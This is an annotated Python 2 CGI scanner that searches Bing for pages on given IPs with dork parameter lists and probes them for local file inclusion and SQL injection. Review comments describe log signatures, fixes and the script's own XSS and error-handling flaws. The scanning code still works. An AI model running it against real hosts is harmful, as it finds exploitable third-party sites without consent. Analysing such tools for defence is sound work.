#!/Python27/python
#M4 SCANNER // By INJ3CTOR_M4
# Python 2 CGI script: it prints an HTML form, then (further down) uses the
# submitted values to drive outbound HTTP requests from the hosting server.
# No access check is visible anywhere in this listing, so whoever can reach
# the CGI URL can trigger those requests.
import cgi, requests, urllib, re
# cgitb.enable() renders full tracebacks into the HTTP response, which
# discloses file paths and source context to any visitor when a request fails.
import cgitb; cgitb.enable()
# Response header plus the static form. The form posts back to this same
# script with two fields: "targets" (free text) and "scantype" (one of the
# two option values below, which the dispatcher compares as literal strings).
print """Content-type: text/html\n\n
<style type="text/css">
* { font-family: Arial; font-size: 12px; }
body { margin: 0px; }
pre { margin: 2px; }
</style>
<title> M4 SERVER SCANNER </title>
<form method="POST">
<center>
<br /><big><b><font color=black>[+] M4 SERVER SCANNER | By INJ3CTOR_M4 [+] <br />
<font color=black>[+] CGI Version [+] </b><br /></big><br />
<textarea cols=84 rows=10 name="targets" placeholder='127.0.0.1' /></textarea><br /><br />
<select name='scantype'>
<option value='Local File Include'>Local File Include</option>
<option value='SQL Injection'>SQL Injection</option>
<input type=submit value='Start Scan ..' />
</form>
"""
def _Fix(site):
    """Return `site` cut off just after its first '=' (parameter value dropped).

    The '?' that follows the first group is a regex quantifier, not a literal
    question mark, so the pattern keys on the first '=' only. When the
    pattern finds no match, the IndexError from `[0]` is swallowed and the
    function implicitly returns None.
    """
    try:
        return re.findall('(.*?)?(.*?)=(.*?)', site)[0][1]+'='
    except:
        # Bare except: every failure is silenced here, not only IndexError,
        # so callers receive None with no indication of what went wrong.
        pass
def lfi(link):
    """Request `link` with a marker value and print an HTML verdict.

    The URL is truncated after its first '=' by _Fix and the literal marker
    '_m4_' is appended as the parameter value. "Vulnerable" is printed when
    the response body contains 'failed to open stream' (text PHP emits in
    file/include warnings); otherwise "Not Vulnerable" is printed.

    Defender view: in access logs this probe appears as a query-string value
    equal to '_m4_'. The verdict depends entirely on error text reaching the
    client; turning off error display hides that symptom only, while
    restricting include targets to an allow-list addresses the flaw itself.
    """
    site = _Fix(link)
    try:
        # No headers are passed, so the request carries the requests library's
        # default User-Agent. No timeout is passed either, so a target that
        # never answers can hold this CGI process open.
        # If _Fix returned None, site+'_m4_' raises TypeError, which the bare
        # except below swallows.
        if re.search('failed to open stream', requests.get(site+'_m4_').text):
            # `site` and `link` are interpolated into the HTML response
            # unescaped; they originate from search-result markup, i.e.
            # third-party content rendered in the operator's browser.
            print "<br /><b> %s <font color=green> Vulnerable !</font></b><br />"%(site)
        else:
            # This branch reports the original `link`, the branch above the
            # truncated `site`.
            print "<br /><b> %s <font color=red> Not Vulnerable !</font></b><br />"%(link)
    except:
        # Network errors, bad URLs and the None case all end here silently;
        # such links produce no output line at all.
        pass
def check_sql_inj(link):
    """Request `link` with '%27' appended and print an HTML verdict.

    '%27' is a URL-encoded single quote. The response body is searched for a
    set of database/PHP error phrases; any hit prints "Vulnerable", no hit
    prints "Not Vulnerable".

    Defender view: in access logs this probe appears as a request whose last
    parameter value ends in %27. The check only sees what the application
    returns to the client, so verbose database errors are what it keys on;
    parameterised queries address the flaw itself, and generic error pages
    keep query details out of responses.
    """
    try:
        # No timeout and no custom headers are passed to requests.get.
        data = requests.get(link+'%27').text
        # NOTE(review): the alternatives are written as plain text, but '()'
        # and '*' are regex metacharacters here, so several of them do not
        # match literally. 'Syntax error' and 'Fatal error' are generic
        # phrases. A "Vulnerable" line therefore means only that one of these
        # patterns occurred somewhere in the page.
        if re.search('error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error', data):
            # `link` is written into the HTML response without escaping.
            print "<br /><b> %s <font color=green> Vulnerable !</font></b><br />"%(link)
        else:
            print "<br /><b> %s <font color=red> Not Vulnerable !</font></b><br />"%(link)
    except:
        # Any failure (connection error, invalid URL, ...) is silenced, so
        # the link is simply missing from the output.
        pass
def Bing(dork):
    """Collect result links for search query `dork` from bing.com.

    Pages through the results by raising the `first` offset in steps of 10
    and stops when a page lacks the 'class="sb_pagN"' marker. Returns the
    links found, de-duplicated through a set (order is not preserved).

    NOTE(review): the paste lost its indentation; the loop nesting below is
    the most plausible reading and should be confirmed against an original.
    """
    # Fixed User-Agent sent to the search engine only; the probes made to
    # result links elsewhere in this file do not pass it.
    user_agent = {'User-Agent': 'SamsungI8910/SymbianOS/9.1 Series60/3.0'}
    alllinks = []
    i=1
    # There is no page cap and no timeout: the loop ends only when the
    # pagination marker is absent from a response.
    while True:
        # Plain-HTTP request; the query is URL-encoded with quote_plus.
        data = requests.get('http://www.bing.com/search?q='+urllib.quote_plus(dork)+'&first='+str(i), headers=user_agent).text
        # Links are scraped by regex from specific result markup; if that
        # markup is absent the function returns an empty list.
        matches = re.findall('<h2 class="sb_h3 cttl"><a href="(.*?)"',data)
        for link in matches:
            alllinks.append(link)
        i+=10
        if not re.search('class="sb_pagN"', data):
            break
    return list(set(alllinks))
# Request dispatcher: reads the posted form and runs the selected check for
# every line of the "targets" field.
# NOTE(review): the paste lost its indentation; the nesting below is the most
# plausible reading and should be confirmed against an original.
#
# Security observations on this CGI as deployed code:
#  - No authentication or authorisation check precedes the scan, so any
#    client that can POST to this URL makes the host issue the requests.
#  - `ip` comes straight from the request and is written into the HTML
#    response unescaped (reflected script injection in the operator's page).
#  - Each target line is placed into a search query after 'ip:' with no
#    format validation.
form = cgi.FieldStorage()
if form.has_key("targets"):
    # One entry per line of the textarea; values are used as submitted.
    targets = form.getvalue("targets").split("\n")
    if form.has_key("scantype"):
        scantype = form.getvalue("scantype")
        # Any scantype other than the two literals below does nothing.
        if scantype == 'Local File Include':
            for ip in targets:
                print '<br /><br /><b>Start Scanning %s ...</b><br /><br />' %(ip)
                # Parameter names searched for among pages indexed for this IP.
                dorks = ['.php?action=', '.php?download=', '.php?file=', '.php?f=', '.php?page=', '.php?pg=', '.php?pagina=', '.php?lang=', '.php?language=']
                for dork in dorks:
                    # One search per (ip, dork) pair, then one probe per link.
                    for link in Bing('ip:'+ip+' '+dork):
                        lfi(link)
        elif scantype == 'SQL Injection':
            for ip in targets:
                print '<br /><br /><b>Start Scanning %s ...</b><br /><br />' %(ip)
                # Parameter names searched for among pages indexed for this IP.
                dorks = ['?id=', '.php?id=', '.php?category=', '.php?cat=', '.php?article_id=', '.php?product_id=', '?attachment_id=']
                for dork in dorks:
                    for link in Bing('ip:'+ip+' '+dork):
                        check_sql_inj(link)